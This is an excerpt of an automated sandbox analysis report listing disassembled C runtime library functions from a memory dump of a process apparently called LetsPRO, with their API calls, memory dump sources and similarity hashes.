                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C97C0A5 Relevance: 16.6, APIs: 11, Instructions: 95COMMON
                                        Download Yara Rule
                                        APIs
                                        • _calloc_crt.MSVCR100(00000008,00000001), ref: 6C97C0BE
                                        • _errno.MSVCR100 ref: 6C97C0CB
                                        • _calloc_crt.MSVCR100(000000D8,00000001), ref: 6C97C0E2
                                        • free.MSVCR100(00000000), ref: 6C97C0F0
                                        • _calloc_crt.MSVCR100(00000220,00000001), ref: 6C97C0FE
                                        • free.MSVCR100(00000000), ref: 6C97C10E
                                        • free.MSVCR100(00000000,00000000), ref: 6C97C114
                                        • __copytlocinfo_nolock.LIBCMT ref: 6C97C123
                                        • free.MSVCR100(00000000,00000000,00000000), ref: 6C97C149
                                        • free.MSVCR100(?), ref: 6C97C169
                                        • free.MSVCR100(00000000,00000000,00000000,?), ref: 6C97C17D
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: free$_calloc_crt$__copytlocinfo_nolock_errno
                                        • String ID:
                                        • API String ID: 717730667-0
                                        • Opcode ID: a60ffe56a75a97b27774525b1762a531a3a4a1dd8491dc99b331375983bf75ae
                                        • Instruction ID: 2e5f3d556c9bccde447a9254d719ab95a1b9e805e755f78a9f8793510ef3bf2d
                                        • Opcode Fuzzy Hash: a60ffe56a75a97b27774525b1762a531a3a4a1dd8491dc99b331375983bf75ae
                                        • Instruction Fuzzy Hash: 0B21F935246600EBD7326F69D804A8B7BF5EF76758B20442DE48857F60DF31D944C6A4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C94C4E5 Relevance: 16.6, APIs: 11, Instructions: 66threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _errno.MSVCR100 ref: 6C94C4F5
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C94C500
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • __set_flsgetvalue.MSVCR100 ref: 6C94C50B
                                        • _calloc_crt.MSVCR100(00000001,00000214), ref: 6C94C517
                                        • _getptd.MSVCR100 ref: 6C94C524
                                        • _initptd.MSVCR100(00000000,?), ref: 6C94C52D
                                        • CreateThread.KERNEL32(00000000,?,6C94C48C,00000000,00000004,00000000), ref: 6C94C54B
                                        • ResumeThread.KERNEL32(00000000), ref: 6C94C55B
                                        • GetLastError.KERNEL32 ref: 6C94C566
                                        • free.MSVCR100(00000000), ref: 6C94C56F
                                        • __dosmaperr.LIBCMT(00000000), ref: 6C94C57A
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Thread$CreateErrorLastResume__dosmaperr__set_flsgetvalue_calloc_crt_errno_getptd_initptd_invalid_parameter_invalid_parameter_noinfofree
                                        • String ID:
                                        • API String ID: 697002476-0
                                        • Opcode ID: ee61d4d8ea3d309f87b65503edfa3e1f240249169ad36f63a14b2319e8043164
                                        • Instruction ID: 37299f8f807ab3557969f498c401eb99ecb60afd69a8b903b2a0f4ee6f13888b
                                        • Opcode Fuzzy Hash: ee61d4d8ea3d309f87b65503edfa3e1f240249169ad36f63a14b2319e8043164
                                        • Instruction Fuzzy Hash: D411C6767057406FD7216AB59C44E9E3FA8DFA277CB204619F52897AC0DF71C40886A4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C90F82D Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 395COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __cftof__forcdecpt_l_strlenfree
                                        • String ID: @$g
                                        • API String ID: 2465213841-2917482895
                                        • Opcode ID: bb086ce98e433d366670709ded0591de37edffc8ab9060ff0bc43aafe08da377
                                        • Instruction ID: 38e5f4904cb6194871c5b7f00e09b1441a29ae91ea746b35ad59c285d4b87779
                                        • Opcode Fuzzy Hash: bb086ce98e433d366670709ded0591de37edffc8ab9060ff0bc43aafe08da377
                                        • Instruction Fuzzy Hash: 1BF17B71E4962D8ADB208F58CC887D8B7B8BB5531CF2402DED818A6A51D774DBC5CF88
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C90F9B0 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 251COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __aulldvrm__forcdecpt_l_get_printf_count_output_strlenfree
                                        • String ID: @$g
                                        • API String ID: 1547650701-2917482895
                                        • Opcode ID: cbfae9653b67d6fbdc2ffba7113b25efc8c4dec8b5552074f567010558b281ca
                                        • Instruction ID: 5756d0bb6c35bf7c9f96791f9c6e763af87a6ebe0a54c173fff52a9c60f8c5af
                                        • Opcode Fuzzy Hash: cbfae9653b67d6fbdc2ffba7113b25efc8c4dec8b5552074f567010558b281ca
                                        • Instruction Fuzzy Hash: 29B16A72A4926D8FDB208B54CC887D9B7B8AB5931CF2002DDD818A6A51D774DFC5CF88
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C9124BC Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85COMMON
                                        Download Yara Rule
                                        APIs
                                        • _lock.MSVCR100(00000007,6C912568,0000000C), ref: 6C9124CA
                                          • Part of subcall function 6C900940: EnterCriticalSection.KERNEL32(00000001,00000001,?,6C901F15,0000000D), ref: 6C90095B
                                        • _wcslen.LIBCMT(00000000,6C912568,0000000C), ref: 6C912521
                                        • wcscpy_s.MSVCR100(?,?,00000000,6C912568,0000000C), ref: 6C91253F
                                        • _errno.MSVCR100(6C912568,0000000C), ref: 6C9308F4
                                        • _invalid_parameter_noinfo.MSVCR100(6C912568,0000000C), ref: 6C9308FE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CriticalEnterSection_errno_invalid_parameter_noinfo_lock_wcslenwcscpy_s
                                        • String ID: "
                                        • API String ID: 173085347-123907689
                                        • Opcode ID: f974e7bfd2a1167dcc1785e279ad4977d2e013bd01a1f6562289bedd3a8541f9
                                        • Instruction ID: d5d938ef553173399ecd69cd669f60ff3682405135bd0ed6ab165c0cc8f3a2b7
                                        • Opcode Fuzzy Hash: f974e7bfd2a1167dcc1785e279ad4977d2e013bd01a1f6562289bedd3a8541f9
                                        • Instruction Fuzzy Hash: 99212571A0968EDBDF10AFA888C94DE73A4BF26308F20147DE524C7E40D730C5488B91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C9184DC Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 60COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _getptd$CreateFrameInfo
                                        • String ID: csm
                                        • API String ID: 4181383844-1018135373
                                        • Opcode ID: 770d38184ddeb556a7aabc5642a0897efea376120a1b98ecef2a8e6bf5d8ab20
                                        • Instruction ID: 5aae47a6023858a464e04cbb9b759884b128afb98a16ff24a1312082b019c97e
                                        • Opcode Fuzzy Hash: 770d38184ddeb556a7aabc5642a0897efea376120a1b98ecef2a8e6bf5d8ab20
                                        • Instruction Fuzzy Hash: 44112735908604CFC7248F25C445BA977A8FF2172EF1A86ABC06DC7E51DB34E4499F85
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C90235B Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 53COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • malloc.MSVCR100(?), ref: 6C902366
                                          • Part of subcall function 6C900263: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,6C900B72,00000001,00000001,00000001,?,6C90A9B4,00000018,6C90A988,0000000C,6C927537), ref: 6C900293
                                        • _callnewh.MSVCR100(?), ref: 6C92F2F8
                                        • std::exception::exception.LIBCMT(?,00000001), ref: 6C92F32F
                                        • atexit.MSVCR100(6C9A0AC8,?,00000001), ref: 6C92F33F
                                        • std::exception::exception.LIBCMT(6C9A8518), ref: 6C92F349
                                        • _CxxThrowException.MSVCR100(?,6C90C8D8,6C9A8518), ref: 6C92F35A
                                        • _errno.MSVCR100 ref: 6C92F369
                                        • _errno.MSVCR100 ref: 6C92F376
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errnostd::exception::exception$AllocExceptionHeapThrow_callnewhatexitmalloc
                                        • String ID: bad allocation
                                        • API String ID: 2638965609-2104205924
                                        • Opcode ID: bb79e8304c7ef7d6525c10653fde29ceb2f87f8c632875a1c6b9ec1b0057aa50
                                        • Instruction ID: f3afb43c5d202e8a92e2e0d084983fab11b975b8ba674d3686a1310f078ec151
                                        • Opcode Fuzzy Hash: bb79e8304c7ef7d6525c10653fde29ceb2f87f8c632875a1c6b9ec1b0057aa50
                                        • Instruction Fuzzy Hash: 7401C031B0024AAADF48EBA4D8056DD7BBCAF61A5CB2410DDD800A2E90DB71DB45C795
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C916113 Relevance: 15.2, APIs: 10, Instructions: 245COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,?,?,00000000,00000000), ref: 6C9161B0
                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000), ref: 6C916216
                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,6C916317,00000000,00000000,00000000), ref: 6C91622F
                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,6C916317,00000000,00000000,00000000), ref: 6C916280
                                        • CompareStringW.KERNEL32(?,?,00000000,?,00000000,00000000), ref: 6C916294
                                        • _freea_s.MSVCR100(00000000), ref: 6C91629E
                                        • _freea_s.MSVCR100(00000000), ref: 6C9162A7
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$_freea_s$CompareString
                                        • String ID:
                                        • API String ID: 3891795400-0
                                        • Opcode ID: 9f9e82713f08cb06b74dc484003d9fdbfc9931d7a2c87de88d0a30b5568eb81d
                                        • Instruction ID: 61da8d153c378479b184172faa93605e3fff6e3f1d1b5e0beaf0207a755d98af
                                        • Opcode Fuzzy Hash: 9f9e82713f08cb06b74dc484003d9fdbfc9931d7a2c87de88d0a30b5568eb81d
                                        • Instruction Fuzzy Hash: A881E532E0929A9FDF118E68CC42BEE3AB9DF46328F241155E824E7ED1C775C954CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C906169 Relevance: 15.2, APIs: 10, Instructions: 194COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000100,00000001,00000000,?,?,?,?,?,?,?), ref: 6C9061B8
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 6C90621B
                                        • LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000), ref: 6C906237
                                        • LCMapStringW.KERNEL32(?,?,?,?,00000000,?), ref: 6C9062A1
                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 6C9062C0
                                        • _freea_s.MSVCR100(00000000), ref: 6C9062CA
                                        • _freea_s.MSVCR100(?), ref: 6C9062D3
                                        • malloc.MSVCR100(00000008), ref: 6C930D89
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$String_freea_s$malloc
                                        • String ID:
                                        • API String ID: 1406006131-0
                                        • Opcode ID: 7e18af288520b9adcca9776ec35bbd4456ab84d35ddb95c3622bb770d31c1d4e
                                        • Instruction ID: 381cb147d4546b59f677b11cf007d8170de6aeacebc9bf320cbb40b9b2f8f778
                                        • Opcode Fuzzy Hash: 7e18af288520b9adcca9776ec35bbd4456ab84d35ddb95c3622bb770d31c1d4e
                                        • Instruction Fuzzy Hash: 39519372A0115AAFDF018F98CC809EE7BBAFF49358F20452DF924D6960D731D990DB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C940D53 Relevance: 15.2, APIs: 10, Instructions: 153COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C940D5A
                                        • EnterCriticalSection.KERNEL32(?,00000010,6C938CAB,00000000,?,6C940B58,?,?,?,00000000), ref: 6C940D6F
                                        • ??2@YAPAXI@Z.MSVCR100(0000000C), ref: 6C940DAF
                                        • ??2@YAPAXI@Z.MSVCR100(00000120), ref: 6C940E02
                                        • _memset.LIBCMT(00000000,00000000,00000120), ref: 6C940E14
                                        • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 6C940E39
                                        • _memset.LIBCMT(00000020,00000000,00000100), ref: 6C940E4D
                                        • SetEvent.KERNEL32(?), ref: 6C940EF4
                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C940F01
                                        • CloseHandle.KERNEL32(00000000), ref: 6C940F25
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ??2@CriticalEventSection_memset$CloseCreateEnterH_prolog3HandleLeave
                                        • String ID:
                                        • API String ID: 3129499143-0
                                        • Opcode ID: 18e115b76167ca5ae73253ec72b2170e7b3ca294d0c3cf93eb7e504cb0f9b0e7
                                        • Instruction ID: 4d0fcc09d464d8f14b9786d71892798c295cd5f48d531323d2192d5e1e8e3cce
                                        • Opcode Fuzzy Hash: 18e115b76167ca5ae73253ec72b2170e7b3ca294d0c3cf93eb7e504cb0f9b0e7
                                        • Instruction Fuzzy Hash: 50514770A007429FD728CF68C484BAABBF4BF19718F10C56DE49A9BB50D730E955CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C95C250 Relevance: 15.1, APIs: 10, Instructions: 131COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _errno.MSVCR100 ref: 6C95C27E
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C95C289
                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,000000FF,?,?,?), ref: 6C95C2EB
                                        • GetLastError.KERNEL32 ref: 6C95C2F5
                                        • _isleadbyte_l.MSVCR100(?,?), ref: 6C95C31B
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?), ref: 6C95C346
                                        • _errno.MSVCR100 ref: 6C95C34C
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide_errno$ErrorLast_invalid_parameter_noinfo_isleadbyte_l
                                        • String ID:
                                        • API String ID: 4049637251-0
                                        • Opcode ID: 124cecf4e57798e8ba8ac7e54b9a537021d64589ef1eb5211cd8b54e6e9f45e5
                                        • Instruction ID: 1bc470d1e1521e96cd2b9d32b7af333cbbe6e2a120ab08936de5e47d100f5782
                                        • Opcode Fuzzy Hash: 124cecf4e57798e8ba8ac7e54b9a537021d64589ef1eb5211cd8b54e6e9f45e5
                                        • Instruction Fuzzy Hash: 1941E730504249EFDF12EF69CC84B9E3BB8FF4A368FA44255E4609ADA1D731C561C761
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C9106EF Relevance: 15.1, APIs: 10, Instructions: 124COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • WideCharToMultiByte.KERNEL32(00000080,00000000,6C9A45D0,00000001,?,?,00000000,?,?,?,?,6C9A45D0,?), ref: 6C91074B
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide
                                        • String ID:
                                        • API String ID: 626452242-0
                                        • Opcode ID: 83e5bfd85721073f49e0b1fecea1fba7a20b49e45748b1b70b6ad1eb4220badf
                                        • Instruction ID: 411da23f0cadcfe698ee8b30a78c6b2f186be42502805544535156bd9c63f3d4
                                        • Opcode Fuzzy Hash: 83e5bfd85721073f49e0b1fecea1fba7a20b49e45748b1b70b6ad1eb4220badf
                                        • Instruction Fuzzy Hash: B2412733905189DFDB109F68C8C49ED3BBCEF02B58B100269E5A48BD94DF35CD458B95
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C95A300 Relevance: 15.1, APIs: 10, Instructions: 116timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _errno.MSVCR100 ref: 6C95A326
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C95A330
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • _get_timezone.MSVCR100(?), ref: 6C95A351
                                        • GetSystemTimeAsFileTime.KERNEL32(?), ref: 6C95A377
                                        • __aulldiv.LIBCMT ref: 6C95A391
                                        • GetTimeZoneInformation.KERNEL32(?,?,?,23C34600,00000000), ref: 6C95A3B9
                                        • __aulldiv.LIBCMT ref: 6C95A427
                                        • __aullrem.LIBCMT ref: 6C95A435
                                        • __aulldiv.LIBCMT ref: 6C95A453
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Time__aulldiv$FileInformationSystemZone__aullrem_errno_get_timezone_invalid_parameter_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 1439004929-0
                                        • Opcode ID: c9b222e78e57c517f1438f77adc0d55b498dfdcf54ccfcbf06fad9a670df6605
                                        • Instruction ID: af3ec4b28bb38f7bed64f867db5b49e2eb12428152251988cf6681d3d067e183
                                        • Opcode Fuzzy Hash: c9b222e78e57c517f1438f77adc0d55b498dfdcf54ccfcbf06fad9a670df6605
                                        • Instruction Fuzzy Hash: 0D41B671A04308DEDB20DFA5DC44F9E77B9FF55718F20454AE21893A80DB70D984CB69
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C948EB3 Relevance: 15.1, APIs: 10, Instructions: 89COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C948EBA
                                          • Part of subcall function 6C942477: __EH_prolog3.LIBCMT ref: 6C94247E
                                          • Part of subcall function 6C942477: InitializeCriticalSectionAndSpinCount.KERNEL32(00000020,00000000,6C93D865,00000000,?,00000000,00000000), ref: 6C9424A9
                                          • Part of subcall function 6C942477: ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000001,?,00000000,00000000), ref: 6C942504
                                          • Part of subcall function 6C942477: ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000002,00000001,?,00000000,00000000), ref: 6C942513
                                          • Part of subcall function 6C942477: ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000003,00000002,00000001,?,00000000,00000000), ref: 6C942522
                                          • Part of subcall function 6C942477: ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000005,00000003,00000002,00000001,?,00000000,00000000), ref: 6C942531
                                          • Part of subcall function 6C942477: ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000006,00000005,00000003,00000002,00000001,?,00000000,00000000), ref: 6C942540
                                          • Part of subcall function 6C942477: ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000008,00000006,00000005,00000003,00000002,00000001,?,00000000,00000000), ref: 6C94254F
                                          • Part of subcall function 6C942477: GetCurrentThread.KERNEL32 ref: 6C94256D
                                          • Part of subcall function 6C942477: GetThreadPriority.KERNEL32(00000000), ref: 6C942574
                                          • Part of subcall function 6C93F157: __EH_prolog3.LIBCMT ref: 6C93F15E
                                          • Part of subcall function 6C93F157: EnterCriticalSection.KERNEL32(6C93D835,00000008,6C948F12), ref: 6C93F170
                                          • Part of subcall function 6C93F157: ??2@YAPAXI@Z.MSVCR100(00000024), ref: 6C93F182
                                          • Part of subcall function 6C93F157: ??2@YAPAXI@Z.MSVCR100(00000030), ref: 6C93F1A7
                                          • Part of subcall function 6C93F157: LeaveCriticalSection.KERNEL32(?), ref: 6C93F1C9
                                        • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 6C948F16
                                        • GetLastError.KERNEL32 ref: 6C948F26
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6C948F3E
                                        • _CxxThrowException.MSVCR100(?,6C9A0D48,00000000), ref: 6C948F4C
                                        • GetLastError.KERNEL32 ref: 6C948F69
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6C948F81
                                        • GetLastError.KERNEL32 ref: 6C948FAB
